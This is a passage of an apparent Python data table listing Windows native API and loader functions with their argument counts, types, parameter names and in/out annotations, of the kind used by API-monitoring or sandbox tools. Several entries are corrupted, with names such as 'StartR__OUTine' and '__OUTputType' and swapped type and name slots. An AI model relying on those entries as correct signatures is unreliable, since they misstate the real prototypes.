None, None, "__IN"]), "NtCreateDirectoryObjectEx": (5, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "HANDLE", "ULONG"], ["DirectoryHandle", "DesiredAccess", "ObjectAttributes", "ShadowDirectoryHandle", "Flags"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN"]), "NtCreateIRTimer": (2, ["PHANDLE", "ACCESS_MASK"], ["TimerHandle", "DesiredAccess"], "NTSTATUS", ["__OUT", "__IN"]), "NtCreateLowBoxToken": (9, ["PHANDLE", "HANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PSID", "DWORD", "PSID_AND_ATTRIBUTES", "DWORD", "PVOID"], ["LowBoxToken", "hOrgToken", "DesiredAccess", "ObjectAttributes", "AppContainerSid", "CapabilityCount", "Capabilities", "LowBoxCount", "LowBoxStruct"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtCreateRegistryTransaction": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG"], ["RegistryHandle", "DesiredAccess", "ObjectAttributes", "Flags"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN"]), "NtCreateThreadEx": (11, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "HANDLE", "PVOID", "PVOID", "ULONG", "ULONG", "ULONG", "ULONG", "PVOID"], ["ThreadHandle", "DesiredAccess", "ObjectAttributes", "ProcessHandle", "StartR__OUTine", "Argument", "CreateFlags", "ZeroBits", "StackSize", "MaximumStackSize", "AttributeList"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN", "__IN_opt", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtCreateTimer2": (5, ["PHANDLE", "PVOID", "POBJECT_ATTRIBUTES", "ULONG", "ACCESS_MASK"], ["TimerHandle", "Unknown1", "ObjectAttributes", "Attributes", "DesiredAccess"], "NTSTATUS", ["__OUT", "__IN_opt", "__IN_opt", "__IN", "__IN"]), "NtCreateTokenEx": (17, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "TOKEN_TYPE", "PLUID", "PLARGE_INTEGER", "PTOKEN_USER", "PTOKEN_GROUPS", "PTOKEN_PRIVILEGES", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "PTOKEN_GROUPS", "PTOKEN_MANDATORY_POLICY", "PTOKEN_OWNER", "PTOKEN_PRIMARY_GROUP", "PTOKEN_DEFAULT_DACL", "PTOKEN_SOURCE"], ["TokenHandle", "DesiredAccess", "ObjectAttributes", "TokenType", "AuthenticationId", "ExpirationTime", "User", "Groups", "Privileges", "UserAttributes", "DeviceAttributes", "DeviceGroups", "TokenMandatoryPolicy", "Owner", "PrimaryGroup", "DefaultDacl", "TokenSource"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN", "__IN_opt", "__IN"]), "NtCreateUserProcess": (11, ["PHANDLE", "PHANDLE", "ACCESS_MASK", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "POBJECT_ATTRIBUTES", "ULONG", "ULONG", "PRTL_USER_PROCESS_PARAMETERS", "PVOID", "PVOID"], ["ProcessHandle", "ThreadHandle", "ProcessDesiredAccess", "ThreadDesiredAccess", "ProcessObjectAttributes", "ThreadObjectAttributes", "ProcessFlags", "ThreadFlags", "ProcessParameters", "CreateInfo", "AttributeList"], "NTSTATUS", ["__OUT", "__OUT", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN", "__IN", "__IN_opt", "__IN_OUT", "__IN_opt"]), "NtCreateWaitablePort": (5, ["PHANDLE", "POBJECT_ATTRIBUTES", "ULONG", "ULONG", "ULONG"], ["PortHandle", "ObjectAttributes", "MaxConnectionInfoLength", "MaxMsgLength", "MaxPoolUsage"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN"]), "NtCreateWnfStateName": (7, ["PCWNF_STATE_NAME", "ULONG", "ULONG", "BOOLEAN", "PVOID", "ULONG", "PSECURITY_DESCRIPTOR"], ["StateName", "Lifetime", "DataScope", "PersistData", "TypeId", "MaximumStateSize", "SecurityDescriptor"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN", "__IN"]), "NtDebugContinue": (3, ["HANDLE", "PCLIENT_ID", "NTSTATUS"], ["DebugHandle", "ClientId", "Status"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtDeleteBootEntry": (1, ["PUNICODE_STRING"], ["Name"], "NTSTATUS", ["__IN"]), "NtDeleteDriverEntry": (1, ["PUNICODE_STRING"], ["Name"], "NTSTATUS", ["__IN"]), "NtDeleteWnfStateData": (2, ["PCWNF_STATE_NAME", "PVOID"], ["StateName", "ExplicitScope"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtDeleteWnfStateName": (1, ["PCWNF_STATE_NAME"], ["StateName"], "NTSTATUS", ["__IN"]), "NtDirectGraphicsCall": (5, ["ULONG", "ULONG", "ULONG", "ULONG", "ULONG"], ["Unknown", "Unknown", "Unknown", "Unknown", "Unknown"], "NTSTATUS", [None, None, None, None, None]), "NtFilterBootOption": (5, ["ULONG", "ULONG", "ULONG", "PVOID", "ULONG"], ["FilterOperation", "ObjectType", "ElementType", "Data", "DataSize"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN"]), "NtFilterToken": (6, ["HANDLE", "ULONG", "PTOKEN_GROUPS", "PTOKEN_PRIVILEGES", "PTOKEN_GROUPS", "PHANDLE"], ["ExistingTokenHandle", "Flags", "SidsToDisable", "PrivilegesToDelete", "RestrictedSids", "NewTokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT"]), "NtFilterTokenEx": (14, ["HANDLE", "ULONG", "PTOKEN_GROUPS", "PTOKEN_PRIVILEGES", "PTOKEN_GROUPS", "ULONG", "PUNICODE_STRING", "ULONG", "PUNICODE_STRING", "PTOKEN_GROUPS", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "PTOKEN_SECURITY_ATTRIBUTES__INFORMATION", "PTOKEN_GROUPS", "PHANDLE"], ["TokenHandle", "Flags", "SidsToDisable", "PrivilegesToDelete", "RestrictedSids", "DisableUserClaimsCount", "UserClaimsToDisable", "DisableDeviceClaimsCount", "DeviceClaimsToDisable", "DeviceGroupsToDisable", "RestrictedUserAttributes", "RestrictedDeviceAttributes", "RestrictedDeviceGroups", "NewTokenHandle"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN", "__IN_opt", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT"]), "NtGetCachedSigningLevel": (6, ["HANDLE", "PULONG", "PBYTE", "PUCHAR", "PULONG", "__opt"], ["File", "Flags", "SigningLevel", "Thumbprint", "ThumbprintSize", "PULONG"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__OUT", "__IN_OUT_opt", None]), "NtGetCompleteWnfStateSubscription": (6, ["PWNF_STATE_NAME", "PULONG", "ULONG", "ULONG", "PVOID", "ULONG"], ["OldDescriptorStateName", "OldSubscriptionId", "OldDescriptorEventMask", "OldDescriptorStatus", "NewDeliveryDescriptor", "DescriptorSize"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN"]), "NtGetContextThread": (2, ["HANDLE", "PCONTEXT"], ["ThreadHandle", "pContext"], "NTSTATUS", ["__IN", "__OUT"]), "NtGetCurrentProcessorNumber": (0, [], [], "ULONG", []), "NtGetCurrentProcessorNumberEx": (1, ["__opt"], ["PULONG"], "NTSTATUS", [None]), "NtGetDevicePowerState": (2, ["HANDLE", "PDEVICE_POWER_STATE"], ["DeviceHandle", "State"], "NTSTATUS", ["__IN", "__OUT"]), "NtImpersonateAnonymousToken": (1, ["HANDLE"], ["THreadHandle"], "NTSTATUS", ["__IN"]), "NtInitializeRegistry": (1, ["ULONG"], ["Options"], "NTSTATUS", ["__IN"]), "NtInitiatePowerAction": (4, ["POWER_ACTION", "SYSTEM_POWER_STATE", "ULONG", "BOOLEAN"], ["Action", "State", "Flags", "Asynch"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NtIsSystemResumeAutomatic": (0, [], [], "NTSTATUS", []), "NtLoadKeyEx": (8, ["POBJECT_ATTRIBUTES", "POBJECT_ATTRIBUTES", "ULONG", "HANDLE", "PVOID", "PVOID", "PVOID", "PIO_STATUS_BLOCK"], ["TargetKey", "SourceFile", "Flags", "TrustClassKey", "Reserved", "ObjectContext", "CallbackReserved", "IoStatusBlock"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_opt", "__IN", "__IN", "__IN", "__OUT"]), "NtLockProductActivationKeys": (2, ["PULONG", "PULONG"], ["ProductBuild", "SafeMode"], "NTSTATUS", ["__IN", "__IN"]), "NtLockRegistryKey": (1, ["HANDLE"], ["KeyHandle"], "NTSTATUS", ["__IN"]), "NtMakePermanentObject": (1, ["HANDLE"], ["Object"], "NTSTATUS", ["__IN"]), "NtManageHotPatch": (4, ["ULONG", "PULONGLONG", "ULONG", "PVOID"], ["Unknown", "Unknown", "Unknown", "Unknown"], "NTSTATUS", [None, None, None, None]), "NtMapCMFModule": (6, ["ULONG", "ULONG", "__opt", "__opt", "__opt", "__opt"], ["What", "Index", "PULONG", "PULONG", "PULONG", "PPVOID"], "NTSTATUS", ["__IN", "__IN", None, None, None, None]), "NtModifyBootEntry": (1, ["PBOOT_ENTRY"], ["BootEntry"], "NTSTATUS", ["__IN"]), "NtModifyDriverEntry": (1, ["PDRIVER_ENTRY"], ["DriverEntry"], "NTSTATUS", ["__IN"]), "NtNotifyChangeDirectoryFileEx": (10, ["HANDLE", "HANDLE", "PIO_APC_R__OUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "ULONG", "BOOLEAN", "DIRECTORY_NOTIFY__INFORMATION_CLASS"], ["FileHandle", "Event", "ApcR__OUTine", "ApcContext", "IoStatusBlock", "Buffer", "Length", "CompletionFilter", "WatchTree", "DirectoryNotifyInformationClass"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_opt_", "__IN_opt_", None, None, "__IN_", "__IN_", "__IN_", "__IN_opt_"]), "NtNotifyChangeMultipleKeys": (12, ["HANDLE", "ULONG", "POBJECT_ATTRIBUTES", "HANDLE", "PIO_APC_R__OUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG", "BOOLEAN", "__opt", "ULONG", "BOOLEAN"], ["MasterKeyHandle", "Count", "SubordinateObjects", "Event", "ApcR__OUTine", "ApcContext", "IoStatusBlock", "CompletionFilter", "WatchTree", "PVOID", "BufferSize", "Asynchronous"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", None, "__IN", "__IN"]), "NtOpenKeyEx": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG"], ["KeyHandle", "DesiredAccess", "ObjectAttributes", "OpenOptions"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN"]), "NtOpenKeyedEvent": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["KeyedEventHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtOpenRegistryTransaction": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["RegistryHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN"]), "NtPlugPlayControl": (3, ["ULONG", "PVOID", "ULONG"], ["Class", "Buffer", "BufferSize"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN"]), "NtPssCaptureVaSpaceBulk": (5, ["HANDLE", "PVOID", "PVOID", "SIZE_T", "PSIZE_T"], ["ProcessHandle", "BaseAddress", "Buffer", "Length", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT"]), "NtQueryAuxiliaryCounterFrequency": (1, ["PULONGLONG"], ["lpAuxiliaryCounterFrequency"], "NTSTATUS", ["__OUT"]), "NtQueryDebugFilterState": (2, ["ULONG", "ULONG"], ["Component", "Level"], "NTSTATUS", ["__IN", "__IN"]), "NtQueryInformationByName": (5, ["POBJECT_ATTRIBUTES", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE__INFORMATION_CLASS"], ["ObjectAttributes", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN"]), "NtQueryInstallUILanguage": (1, ["PULONG"], ["LanguageId"], "NTSTATUS", ["__OUT"]), "NtQueryLicenseValue": (5, ["PUNICODE_STRING", "PULONG", "PVOID", "ULONG", "PULONG"], ["Name", "Type", "Buffer", "Length", "ReturnedLength"], "NTSTATUS", ["__IN", "__OUT_opt", "__OUT", "__IN", "__OUT"]), "NtQueryOpenSubKeys": (2, ["POBJECT_ATTRIBUTES", "PULONG"], ["TargetKey", "HandleCount"], "NTSTATUS", ["__IN", "__OUT"]), "NtQueryOpenSubKeysEx": (4, ["POBJECT_ATTRIBUTES", "ULONG", "PVOID", "PULONG"], ["TargetKey", "BufferLength", "Buffer", "ResultLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__OUT"]), "NtQueryPortInformationProcess": (0, [], [], "NTSTATUS", []), "NtQuerySecurityPolicy": (6, ["PUNICODE_STRING", "PUNICODE_STRING", "PUNICODE_STRING", "PULONG", "PBOOLEAN", "PULONG"], ["Category", "SubCategory", "Policy", "Unknown", "Enabled", "Subsystem"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_OUT", "__OUT", "__IN"]), "NtQueryWnfStateNameInformation": (5, ["PCWNF_STATE_NAME", "ULONG", "PVOID", "PVOID", "ULONG"], ["StateName", "NameInfoClass", "ExplicitScope", "InfoBuffer", "InfoBufferSize"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__OUT", "__IN"]), "NtRenameKey": (2, ["HANDLE", "PUNICODE_STRING"], ["KeyHandle", "ReplacementName"], "NTSTATUS", ["__IN", "__IN"]), "NtResumeProcess": (1, ["HANDLE"], ["hProcess"], "NTSTATUS", ["__IN"]), "NtRevertContainerImpersonation": (0, [], [], "NTSTATUS", []), "NtRollbackRegistryTransaction": (2, ["HANDLE", "BOOL"], ["RegistryHandle", "Wait"], "NTSTATUS", [None, None]), "NTSaveKeyEx": (3, ["HANDLE", "HANDLE", "ULONG"], ["KeyHandle", "FileHandle", "Flags"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NTSaveMergedKeys": (3, ["HANDLE", "HANDLE", "HANDLE"], ["HighPrecedenceKeyHandle", "LowPrecedenceKeyHandle", "FileHandle"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NTSecureConnectPort": (9, ["PHANDLE", "PUNICODE_STRING", "ULONG", "PPORT_VIEW", "PSID", "PREMOTE_PORT_VIEW", "PULONG", "PVOID", "PULONG"], ["PortHandle", "Name", "QOS", "pSectionInfo", "SecurityInfo", "pSectionMapInfo", "MaxMsgLength", "ConnectData", "ConnectDataLength"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN_OUT", "__IN", "__IN_OUT", "__OUT", "__IN_OUT_opt", "__IN_OUT_opt"]), "NTSetBootOptions": (2, ["PVOID", "ULONG"], ["Buffer", "BufferLength"], "NTSTATUS", ["__IN", "__IN"]), "NTSetCachedSigningLevel": (5, ["ULONG", "BYTE", "PHANDLE", "ULONG", "HANDLE"], ["Flags", "InputSigningLevel", "SourceFiles", "SourceFileCount", "TargetFile"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN_opt"]), "NTSetCachedSigningLevel2": (6, ["ULONG", "BYTE", "PHANDLE", "ULONG", "HANDLE", "PVOID"], ["Flags", "InputSigningLevel", "SourceFiles", "SourceFileCount", "TargetFile", "LevelInformation"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN_opt", "__IN_opt"]), "NTSetContextThread": (2, ["HANDLE", "PCONTEXT"], ["ThreadHandle", "pContext"], "NTSTATUS", ["__IN", "__IN"]), "NTSetDebugFilterState": (3, ["ULONG", "ULONG", "BOOLEAN"], ["Component", "Level", "State"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NTSetDefaultUILanguage": (1, ["ULONG"], ["LanguageId"], "NTSTATUS", ["__IN"]), "NTSetIRTimer": (2, ["HANDLE", "PLARGE_INTEGER"], ["TimerHandle", "Time"], "NTSTATUS", ["__IN", "__IN_opt"]), "NTSetInformationDebugObject": (5, ["HANDLE", "DEBUGOBJECTINFOCLASS", "PVOID", "ULONG", "PULONG"], ["DebugHandle", "Class", "Buffer", "Length", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__OUT_opt"]), "NTSetInformationSymbolicLink": (4, ["HANDLE", "ULONG", "PVOID", "ULONG"], ["Handle", "Class", "Buffer", "BufferLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NTSetLdtEntries": (6, ["ULONG", "ULONG", "ULONG", "ULONG", "ULONG", "ULONG"], ["Selector1", "LdtEntry1L", "LdtEntry1H", "Selector2", "LdtEntry2L", "LdtEntry2H"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NTSetSystemEnvironmentValueEx": (5, ["PUNICODE_STRING", "PVOID", "PVOID", "ULONG", "ULONG"], ["Name", "Guid", "Buffer", "BufferLength", "Attributes"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN"]), "NTSetSystemPowerState": (3, ["POWER_ACTION", "SYSTEM_POWER_STATE", "ULONG"], ["Action", "State", "Flags"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NTSetThreadExecutionState": (2, ["ULONG", "PULONG"], ["State", "PreviousState"], "NTSTATUS", ["__IN", "__OUT"]), "NTSetUuidSeed": (1, ["PUCHAR"], ["UuidSeed"], "NTSTATUS", ["__IN"]), "NTSubscribeWnfStateChange": (4, ["PCWNF_STATE_NAME", "ULONG", "ULONG", "__opt"], ["StateName", "ChangeStamp", "EventMask", "PULONG"], "NTSTATUS", ["__IN", "__IN_opt", "__IN", None]), "NTSuspendProcess": (1, ["HANDLE"], ["ProcessHandle"], "NTSTATUS", ["__IN"]), "NtTranslateFilePath": (4, ["PVOID", "ULONG", "PVOID", "ULONG"], ["InputPath", "__OUTputType", "__OUTputFilePath", "__OUTputFilePathLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN"]), "NtUnloadKey2": (2, ["POBJECT_ATTRIBUTES", "ULONG"], ["TargetKey", "Flags"], "NTSTATUS", ["__IN", "__IN"]), "NtUnloadKeyEx": (2, ["POBJECT_ATTRIBUTES", "HANDLE"], ["TargetKey", "Event"], "NTSTATUS", ["__IN", "__IN"]), "NtUnsubscribeWnfStateChange": (1, ["PCWNF_STATE_NAME"], ["StateName"], "NTSTATUS", ["__IN"]), "NtVdmControl": (2, ["ULONG", "PVOID"], ["ControlCode", "ControlData"], "NTSTATUS", ["__IN", "__IN"]), "NtWaitForAlertByThreadId": (2, ["HANDLE", "PLARGE_INTEGER"], ["Handle", "Time_Out"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtWaitForDebugEvent": (4, ["HANDLE", "BOOLEAN", "PLARGE_INTEGER", "PULONG"], ["DebugHandle", "Alertable", "Time_Out", "Result"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__OUT"]), "NtLoadKey3": (8, ["POBJECT_ATTRIBUTES", "POBJECT_ATTRIBUTES", "ULONG", "PVOID", "ULONG", "ACCESS_MASK", "HANDLE", "ULONG"], ["KeyObjectAttributes", "FileObjectAttributes", "Flags", "LoadArguments", "LoadArgumentCount", "DesiredAccess", "KeyHandle", "Unkown"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtAlpcConnectPort": (11, ["PHANDLE", "PUNICODE_STRING", "POBJECT_ATTRIBUTES", "PALPC_PORT_ATTRIBUTES", "ULONG", "PSID", "PPORT_MESSAGE", "PULONG", "PALPC_MESSAGE_ATTRIBUTES", "PALPC_MESSAGE_ATTRIBUTES", "PLARGE_INTEGER"], ["PortHandle", "PortName", "ObjectAttributes", "PortAttributes", "Flags", "RequiredServerSid", "ConnectionMessage", "BufferLength", "__OUTMessageAttributes", "__INMessageAttributes", "Time_Out"], "NTSTATUS", [None, "__IN_", "__IN_opt_", "__IN_opt_", "__IN_", "__IN_opt_", None, "__IN_OUT_opt_", "__IN_OUT_opt_", "__IN_OUT_opt_", "__IN_opt_"]), "NtCancelDeviceWakeupRequest": (1, ["HANDLE"], ["Device"], "NTSTATUS", ["__IN_"]), "NtCreateChannel": (2, ["PHANDLE", "POBJECT_ATTRIBUTES"], ["ChannelHandle", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN_opt"]), "NtFreeUserPhysicalPages": (3, ["HANDLE", "PULONG", "PULONG"], ["ProcessHandle", "NumberOfPages", "UserPfnArray"], "NTSTATUS", ["__IN", "__IN_OUT", "__IN_OUT"]), "NtGetPlugPlayEvent": (4, ["PPLUGPLAY_APC_R__OUTINE", "PVOID", "PPLUGPLAY_EVENT_BLOCK", "ULONG"], ["PnPApcR__OUTine", "PnPContext", "PnPEvent", "EventBufferLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN"]), "NtOpenChannel": (2, ["PHANDLE", "POBJECT_ATTRIBUTES"], ["ChannelHandle", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN"]), "NtReplyWaitSendChannel": (3, ["PVOID", "ULONG", "PCHANNEL_MESSAGE"], ["Text", "Length", "*Message"], "NTSTATUS", ["__IN", "__IN", "__OUT"]), "NTSendWaitReplyChannel": (4, ["HANDLE", "PVOID", "ULONG", "PCHANNEL_MESSAGE"], ["ChannelHandle", "Text", "Length", "*Message"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT"]), "NTSetContextChannel": (1, ["PVOID"], ["Context"], "NTSTATUS", ["__IN"]), "NtRequestDeviceWakeup": (1, ["HANDLE"], ["Device"], "NTSTATUS", ["__IN"]), "NtRequestWakeupLatency": (1, ["LATENCY_TIME"], ["latency"], "NTSTATUS", ["__IN"]), "NtW32Call": (5, ["ULONG", "PVOID", "ULONG", "PVOID", "PULONG"], ["ApiNumber", "InputBuffer", "InputLength", "*__OUTputBuffer", "__OUTputLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__OUT"]), "KiUserApcDispatcher": (5, ["PVOID", "PVOID", "PVOID", "PVOID", "PVOID"], ["Unused1", "Unused2", "Unused3", "ContextStart", "ContextBody"], "VOID", ["__IN", "__IN", "__IN", "__IN", "__IN"]), "NtAlertThread": (1, ["HANDLE"], ["ThreadHandle"], "NTSTATUS", ["__IN"]), "NtCallbackReturn": (3, ["PVOID", "ULONG", "NTSTATUS"], ["Result", "ResultLength", "Status"], "NTSTATUS", ["__IN_opt", "__IN", "__IN"]), "NtQueueApcThread": (5, ["HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "ULONG"], ["ThreadHandle", "ApcRoutine", "ApcRoutineContext", "ApcStatusBlock", "ApcReserved"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtTestAlert": (0, [], [], "NTSTATUS", []), "NtAddAtom": (2, ["PWCHAR", "PRTL_ATOM"], ["AtomName", "Atom"], "NTSTATUS", ["__IN", "__OUT"]), "NtDeleteAtom": (1, ["RTL_ATOM"], ["Atom"], "NTSTATUS", ["__IN"]), "NtFindAtom": (2, ["PWCHAR", "PRTL_ATOM"], ["AtomName", "Atom"], "NTSTATUS", ["__IN", "__OUT_opt"]), "NtQueryInformationAtom": (5, ["RTL_ATOM", "ATOM_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["Atom", "AtomInformationClass", "AtomInformation", "AtomInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT_opt"]), "RtlCompressBuffer": (8, ["ULONG", "PVOID", "ULONG", "PVOID", "ULONG", "ULONG", "PULONG", "PVOID"], ["CompressionFormat", "SourceBuffer", "SourceBufferLength", "DestinationBuffer", "DestinationBufferLength", "Unknown", "pDestinationSize", "WorkspaceBuffer"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__IN", "__IN", "__OUT", "__IN"]), "RtlDecompressBuffer": (6, ["ULONG", "PVOID", "ULONG", "PVOID", "ULONG", "PULONG"], ["CompressionFormat", "DestinationBuffer", "DestinationBufferLength", "SourceBuffer", "SourceBufferLength", "pDestinationSize"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN", "__OUT"]), "RtlGetCompressionWorkSpaceSize": (3, ["ULONG", "PULONG", "PULONG"], ["CompressionFormat", "pNeededBufferSize", "pUnknown"], "NTSTATUS", ["__IN", "__OUT", "__OUT"]), "DbgPrint": (1, ["LPCSTR"], ["Format"], "NTSTATUS", ["__IN"]), "NTSystemDebugControl": (6, ["SYSDBG_COMMAND", "PVOID", "ULONG", "PVOID", "ULONG", "PULONG"], ["Command", "InputBuffer", "InputBufferLength", "OutputBuffer", "OutputBufferLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN_opt", "__IN", "__OUT_opt", "__IN", "__OUT_opt"]), "RtlCaptureStackBackTrace": (4, ["ULONG", "ULONG", "PVOID", "PULONG"], ["FramesToSkip", "FramesToCapture", "*BackTrace", "BackTraceHash"], "USHORT", ["__IN", "__IN", "__OUT", "__OUT"]), "RtlGetCallersAddress": (2, ["PVOID", "PVOID"], ["*CallersAddress", "*CallersCaller"], "PVOID", ["__OUT", "__OUT"]), "NtDisplayString": (1, ["PUNICODE_STRING"], ["String"], "NTSTATUS", ["__IN"]), "NtRaiseException": (3, ["PEXCEPTION_RECORD", "PCONTEXT", "BOOLEAN"], ["ExceptionRecord", "ThreadContext", "HandleException"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtRaiseHardError": (6, ["NTSTATUS", "ULONG", "PUNICODE_STRING", "PVOID", "HARDERROR_RESPONSE_OPTION", "PHARDERROR_RESPONSE"], ["ErrorStatus", "NumberOfParameters", "UnicodeStringParameterMask", "*Parameters", "ResponseOption", "Response"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN", "__IN", "__OUT"]), "NTSetDefaultHardErrorPort": (1, ["HANDLE"], ["PortHandle"], "NTSTATUS", ["__IN"]), "NtQuerySystemEnvironmentValue": (4, ["PUNICODE_STRING", "PWCHAR", "ULONG", "PULONG"], ["VariableName", "Value", "ValueBufferLength", "RequiredLength"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__OUT_opt"]), "NTSetSystemEnvironmentValue": (2, ["PUNICODE_STRING", "PUNICODE_STRING"], ["VariableName", "Value"], "NTSTATUS", ["__IN", "__IN"]), "RtlCreateEnvironment": (2, ["BOOLEAN", "PVOID"], ["Inherit", "*Environment"], "NTSTATUS", ["__IN", "__OUT"]), "RtlDestroyEnvironment": (1, ["PVOID"], ["Environment"], "VOID", ["__IN"]), "RtlExpandEnvironmentStrings_U": (4, ["PVOID", "PUNICODE_STRING", "PUNICODE_STRING", "PULONG"], ["Environment", "SourceString", "DestinationString", "DestinationBufferLength"], "NTSTATUS", ["__IN_opt", "__IN", "__OUT", "__OUT_opt"]), "RtlQueryEnvironmentVariable_U": (3, ["PVOID", "PUNICODE_STRING", "PUNICODE_STRING"], ["Environment", "VariableName", "VariableValue"], "NTSTATUS", ["__IN_opt", "__IN", "__OUT"]), "RtlSetCurrentEnvironment": (2, ["PVOID", "PVOID"], ["NewEnvironment", "*OldEnvironment"], "VOID", ["__IN", "__OUT_opt"]), "RtlSetEnvironmentVariable": (3, ["PVOID", "PUNICODE_STRING", "PUNICODE_STRING"], ["*Environment", "VariableName", "VariableValue"], "NTSTATUS", ["__IN_OUT_opt", "__IN", "__IN"]), "LdrGetDllHandle": (4, ["PWORD", "PVOID", "PUNICODE_STRING", "PHANDLE"], ["pwPath", "Unused", "ModuleFileName", "pHModule"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN", "__OUT"]), "LdrGetProcedureAddress": (4, ["HMODULE", "PANSI_STRING", "WORD", "PVOID"], ["ModuleHandle", "FunctionName", "Oridinal", "*FunctionAddress"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__OUT"]), "LdrLoadDll": (4, ["PWCHAR", "ULONG", "PUNICODE_STRING", "PHANDLE"], ["PathToFile", "Flags", "ModuleFileName", "ModuleHandle"], "NTSTATUS", ["__IN_opt", "__IN_opt", "__IN", "__OUT"]), "LdrQueryProcessModuleInformation": (3, ["PSYSTEM_MODULE_INFORMATION", "ULONG", "PULONG"], ["SystemModuleInformationBuffer", "BufferSize", "RequiredSize"], "NTSTATUS", ["__OUT", "__IN", "__OUT_opt"]), "LdrShutdownProcess": (0, [], [], "VOID", []), "LdrShutdownThread": (0, [], [], "VOID", []), "LdrUnloadDll": (1, ["HANDLE"], ["ModuleHandle"], "NTSTATUS", ["__IN"]), "NtLoadDriver": (1, ["PUNICODE_STRING"], ["DriverServiceName"], "NTSTATUS", ["__IN"]), "NtUnloadDriver": (1, ["PUNICODE_STRING"], ["DriverServiceName"], "NTSTATUS", ["__IN"]), "RtlImageNtHeader": (1, ["PVOID"], ["ModuleAddress"], 